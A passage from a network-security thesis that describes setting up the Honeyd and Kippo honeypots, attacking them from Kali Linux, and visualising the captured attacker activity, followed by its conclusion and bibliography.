This chapter mainly focus on the implementation of the thesis. By implementingsome of the most useful honeypot and honeynet technologies that exist at the timeof writing this thesis for Designing Countermeasures For Tomorrows Threats. Manyhoneypot and honeynet technologies implemented during the researches for the thesisboth open source and close source but in here just focused on two important honeypotsystems technologies that are successfully implemented.

The first honeypot system technology is Honeyd (Honey Daemon) which is anopen source low level interaction honeypot system technology which discussed withits details in previous chapters.

The second is Kippo honeypot system technology that also an open source mediumlevel interaction honeypot system technology. Also this technology is discussed indetail in previous chapters.

In here two operating systems are used for implementing of these technologiesUbuntu for implementing of technologies and Kali Linux for attacking to the systemsas shown in figure 6.1.

47


Figure 6.1: The Used Operating Systems

6.1 Implementation of Honeyd (Honey Daemon)

Technology

Honeyd technology was discussed in details in previous chapters and this chapterjust focus on implementation of Honeyd technology step by step with screenshots.

Figure 6.2 shows the installing of Honeyd honeypot system technology it is donewith the commandsudo apt-get install honeyd like installation of any other applications.

Figure 6.2: The Installation of Honeyd Technology

After installing of Honeyd Honeypot system technology going to see the files andconfig files of Honeyd Technology for configuration as shown in figure 6.3.

Chapter 6 48


Figure 6.3: The List of Honeypot Folder

As discussed before Honeyd technology can emulate many different devices suchas switches, routers and operating systems from various companies open source andclose source. In here for instance it is a Microsoft Windows XP Professional SP1 foremulation as shown in figure 6.4.

Figure 6.4: Making of a Template For Emulation

Figure 6.5 shows another template that emulate a Cisco router with vulnerabilitiesfor trapping the attackers, interact with them and capture their interaction with therouter. In here you see the SSH and Telnet port that linked to some scripts. Whilethe attackers trying to connect to these ports the connection will be redirect to thescripts and start interacting with the attackers for logging their actions.

Figure 6.5: Making of a Router Template For Emulation

Here are the scripts for Honeyd Technology that use these scripts for emulatingfake services for the attackers as shown in figure 6.6 there are lots of services here

Chapter 6 49


and you can customize or build new services to do what you want. Usually you canbuild the services by using the Scripting Languages such as Shell and Perl scriptinglanguages.

Figure 6.6: The Scripts For Service Emulation of Honeyd Technology

For starting the Honeyd honeypot system there is command that is shown infigure 6.7 by entering that command the Honeyd technology will start running. Thiscommand takes lots of parameters like the configuation file, fingerprint file, log file,interface card and etcetera.

Figure 6.7: Running of the Honeyd Technology

Figure 6.8 shows the attacker side when ping a fake system.

Chapter 6 50


Figure 6.8: Pinging the Emulated Systems

Figure 6.9 shows the Honeyd technology system capturing the interaction with theattackers.

Figure 6.9: Capturing the Attackers Interaction

When the attacker nmap for open or vulnerable ports as shown in figure 6.10

Chapter 6 51


Figure 6.10: The nmap of Emulated System for Ports Vulnerabilities

Figure 6.11 shows the process of running a python Script for entering gatheredinformation into the a MySQL Database.

Figure 6.11: Running of the Honeyd2MySQL For Entering Captured Data into aMySQL Database

This is the process of entering gathered information into the MySQL Database asshown in figure 6.12.

Chapter 6 52


Figure 6.12: The Process of Entering Gathered Informations to the MySQL Database

Here are the Honeyd-VIZ web interface files shown in figure 6.13.

Figure 6.13: The list of files of Honeyd-VIZ Web Interface

The figure 6.14 shwos the Web interface configuration file.

Chapter 6 53


Figure 6.14: The Web Interface Configuration File

After opening the web interface at first it must generate the Honeyd Graphs fromits databse that we enter the gathered information before as shown in figure 6.15.

Figure 6.15: Generating the Honeyd-VIZ Graph

After generating the graphs there are many other useful capabilities such Honeyd-Geographical information that shows the attackers location all over the world asshown in figure 6.16.

Chapter 6 54


Figure 6.16: The Geographical Location of the Attackers

Figure 6.17 shows that there are many kinds of graphs for various issues and allthe graphs are in graph gallery.

Figure 6.17: The Various Graphs For Different Issues

Chapter 6 55


6.2 Implementation of Kippo Technology

The second technology that is implemented in this thesis is Kippo honeypot sytemtechnology it is an open source medium level interaction honeypot system technology.After installing this into a system it can be start by a command as shown in figure6.18.

Figure 6.18: The List of Files and Running of Kippo Technology

Kippo has a valid user database file that you can put some usernames and pass-words there. As shown in figure 6.19 these entered username passwords are valid tothe Kippo honeypot technology and everyone can login with these username pass-words to the system and start interacting with the Kippo honeypot system technol-ogy.

Chapter 6 56


Figure 6.19: The Valid Users Database

This is the first SSH connection that successfully responded with Kippo honeypotsystem technology and ask for connection and adding this system to the list ofknown-hosts as shown in figure 6.20.

Figure 6.20: Start Attacking to the Kippo Technology

As shown in figure 6.21 you can monitor the Kippo log file live or realtime to seethe connections and interactions with the Kippo honeypot system technology.

Chapter 6 57


Figure 6.21: Live Monitoring Log File of Kippo Techonology

This one also shows the live monitoring of Kippo logfile as shown in figure 6.22.

Figure 6.22: Live Monitoring Log file of Kippo Technology

Figure 6.23 shows the attempting to enter the system with unvalid username pass-word or the username and password which are not entered to the valid usernamepassword file that you saw before.

Chapter 6 58


Figure 6.23: Attempting to Connect With Wrong Passwords

Entering to the system with correct username and passwords and start interactingwith the system just like a real system as shown in figure 6.24.

Figure 6.24: Attempting to Connect With Correct Passwords

Figure 6.25 shows the process of adding new users to the system.

Chapter 6 59


Figure 6.25: After Entering Interacting With Emulated System Adding New Users

Doing more interactions making files and folders and manipulate them as shownin figure 6.26.

Figure 6.26: Doing More Interactions Making Files and Folders

Seeing the network interface cards with details.

Chapter 6 60


Figure 6.27: And More Interaction Monitoring Network Interfaces

Figure 6.28 shows the live monitoring of Kippo honeypot system technology logfile for the attacking and interactions.

Figure 6.28: Monitoring Kippo Technology Log File Real Time

Chapter 6 61


Running the a script for entering the gathered information into a MySQL Databasefor analyzing them as shown in figure 6.29.

Figure 6.29: Running the Kipp2MySQL Script for Entering Gathered Informationto the Database

Figure 6.30 shows the process of entering the gathered information into the database.

Figure 6.30: Entering Gathered Information to The Databse

Chapter 6 62


The list of web interface and configuration files as shown in figure 6.31.

Figure 6.31: List of Web Interface Files and Configuation File

Figure 6.32 shows the web interface configuration file.

Figure 6.32: Web Interface Configuration File

As shown in figure 6.33 at first when opening the web interface it is a must togenerate the Graphs from gathered information.

Chapter 6 63


Figure 6.33: Generating Graphs From Gathered Information

After generating the graphs you can many beautiful graph from various gatheredinformations as shown in figure 6.34.

Figure 6.34: Various Graphs for Different Issues

Figure 6.35 shows the commands that the attackers used inside the target system.

Chapter 6 64


Figure 6.35: The Commands that the Attackers Used

The list of attackers interaction from entering until the end or leaving the systemlike a video player as shown in figure 6.36.

Figure 6.36: The Kippo Play Log

Here is playing the attackers interaction and watch what the attackers doing insidethe target system as shown in figure 6.37 .

Chapter 6 65


Figure 6.37: The Kippo Play Log

Like the Honeyd honeypot system technology Kippo technology also has the ca-pability to show the attackers locations all over the world as shown in figure 6.38.

Figure 6.38: The Geographical Location of the Attackers

Finally it has the Graph Gallery cover many different graphs for various issues thatall these graphs are built according to the gathered information from the attackersas shown in figure 6.39 .

Chapter 6 66


Figure 6.39: The Graph Gallery of Kipp Technology

Chapter 6 67

Conclusion

Network security problems exists everywhere specially in military, organizations,universities, banks, private sectors, ISPs, airports, transportd and etc.Once the attackers attacks to a system it is important to know who is attackingus, how they attacks and what the attackers trying to achieve from attacking tothe target networks. From learning of these important issues you will know how todefend against the attackers.

This thesis researches and implement different solutions for solving these problems.Specially honeypot and honeynet systems concepts used in this thesis for our maintitle which is Designing Countermeasures For Tomorrows Threats. Various honeypotand honeynet system technologies that are exist at the time of writing this thesis.They are discussed in previous chapters.

Finally after implementing various types of honeypot and honeynet system tech-nologies both open source and close source. This thesis present the best solution forsecruring internal networks of Afghanistan specially for government and ministriesfor instance ministry of interior and other important organizations.

68

Further Research

This thesis cover two types of honeypot and honeynet systems low level interactionhoneypot systems and medium level interaction honeypot and honeynet systems.

For future work of this thesis it is nice to research about two other importantissues in honeypot and honeynet sytems.

first research on high level interaction honeypot and honeynet systems. Designingand implementing of them.

Second research specially on honeynet systems. It is obvious that honeynet systemsusually use from real systems for having high level interaction with the attackers.It will also be an important research related to the honeypot and honeynet systemsconcepts.[5] [12]

69

Bibliography

[1] Developments of the Honeyd Virtual Honeypot procedure. http://www.

honeyd.org/. Accessed: 2014-10-05.

[2] How To Install Kippo, an SSH Honeypot, on an Ubuntu Cloud Server procedure.https://github.com/desaster/kippo. Accessed: 2014-11-08.

[3] The Honeynet Project procedure. http://www.honeynet.org/. Accessed:2014-09-08.

[4] John Viega Andy Oram˙Beautiful Security Leading Securiy Experts Explain HowThey Think. April 2009.

[5] Michael D. Bauer. Linux Server Security. January 2005.

[6] John E. Canavan. Fundamentals of Network Security. October 2001.

[7] Robert G. Byrnes Daniel J. Barrett and Richard Silverman. Linux SecurityCookbook. June 2003.

[8] ’ Dr. Eric Cole’, ’ Dr. Ronald Krutz’ and James W. Conley. Network SecurityBible. November 2005.

[9] ’ Mike Chapple James Michael Stewart’, ’ Ed Tittel’. Certified InformationSystems Security Professional. December 2005.

[10] Narinder Kaur. Honeypot. May 2012.

[11] Chris McNab. Network Security Assessment. Augest 2008.

[12] Billy Rios Nitesh Dhanjani and Brett Hardin. Hacking The Next Generation.September 2009.

[13] Prof. T. Ramanujam Ram Kumar Singh˙ Intrusion detection system using ad-vanced honeypots. November 2009.

[14] Christian Plattner Reto Baumann˙Honeypots. February 2002.

[15] Lance Spitzner. Honeypots: Tracking Hackers. September 2002.

[16] Mark D. Spivey. Linux Server Security. June 2007.

70

http://www.honeyd.org/

http://www.honeyd.org/

https://github.com/desaster/kippo

http://www.honeynet.org/


[17] Mark Stamp. Information Security. September 2011.

[18] Nong Ye. Secure Computer and Network Systems. July 2008.

[19] Surabhi Singh Yogendra Kumar Jain˙ Honeypot based secure network system.February 2011.

Chapter 6 71